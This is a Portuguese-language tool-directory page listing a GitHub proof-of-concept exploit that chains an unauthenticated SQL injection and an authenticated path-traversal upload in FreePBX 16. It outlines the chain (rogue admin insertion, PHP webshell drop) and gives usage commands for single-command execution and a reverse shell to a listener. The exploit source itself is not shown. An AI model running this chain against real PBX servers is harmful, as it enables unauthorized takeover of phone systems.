Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
FreePBX-CVE-2025-57819-RCE — Prova de conceito de exploit que combina injeção SQL não autenticada com travessia de caminho autenticada para obter execução remota de código no FreePBX 16. Suporta comandos únicos e shells reversos interativos. | Kitploit
Ferramentas/GitHubGitHub/0xehab/freepbx-cve-2025-57819-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHub0xehab/freepbx-cve-2025-57819-rce

FreePBX-CVE-2025-57819-RCE

Prova de conceito de exploit que combina injeção SQL não autenticada com travessia de caminho autenticada para obter execução remota de código no FreePBX 16. Suporta comandos únicos e shells reversos interativos.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
13há 2 mesesAinda não revisado

FreePBX 16 — SQLi não autenticado para RCE

Exploit proof-of-concept que encadeia duas vulnerabilidades do FreePBX para ir de zero acesso a execução remota de código no FreePBX 16.

CVEComponenteImpacto
CVE-2025-57819Carregador do módulo Endpoint (parâmetro brand)Injeção SQL empilhada não autenticada
CVE-2025-61678Carregador de firmware do Endpoint Manager (parâmetro fwbrand)Upload arbitrário de arquivo autenticado (path traversal)

Como funciona

  1. Criar um admin (CVE-2025-57819) — uma injeção SQL empilhada acessível sem autenticação através do carregador de endpoint namespaced é usada para INSERT um administrador de acesso total novinho em folha diretamente na tabela ampusers.
  2. Autenticar — o PoC faz login no painel administrativo como o usuário recém-criado.
  3. Soltar uma webshell (CVE-2025-61678) — o manipulador de upload de firmware do Endpoint Manager é abusado com um traversal ../../../var/www/html/<dir> em fwbrand para escrever uma webshell PHP na raiz web.
  4. Executar — execute um único comando ou receba um shell reverso interativo.

Versões afetadas

FreePBX 16 (módulo Endpoint anterior à 16.0.92). Também corrigido nas versões 17.0.6. Atualize para uma versão corrigida.

Uso

root@kitploit:~
# single command
python3 exploit.py --rhost pbx.example.com --command "id"

# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

Opções

Requisitos

root@kitploit:~
pip install requests pwntools

Aviso Legal

Apenas para testes de segurança autorizados e fins educacionais. Use-o exclusivamente em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. O autor não assume nenhuma responsabilidade por uso indevido.

Palavras-chave

FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · injeção SQL não autenticada · injeção de consulta empilhada · módulo endpoint · Endpoint Manager · upload de arquivo autenticado · path traversal · execução remota de código · RCE · PoC · exploit · segurança VoIP


linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb

Baixar ferramenta
FlagDescrição
--rhostHost alvo (obrigatório)
--rportPorta alvo (padrão 443)
--httpUsar HTTP em vez de HTTPS
--lhost / --lportEndereço de callback do shell reverso
--commandExecutar um único comando em vez de um shell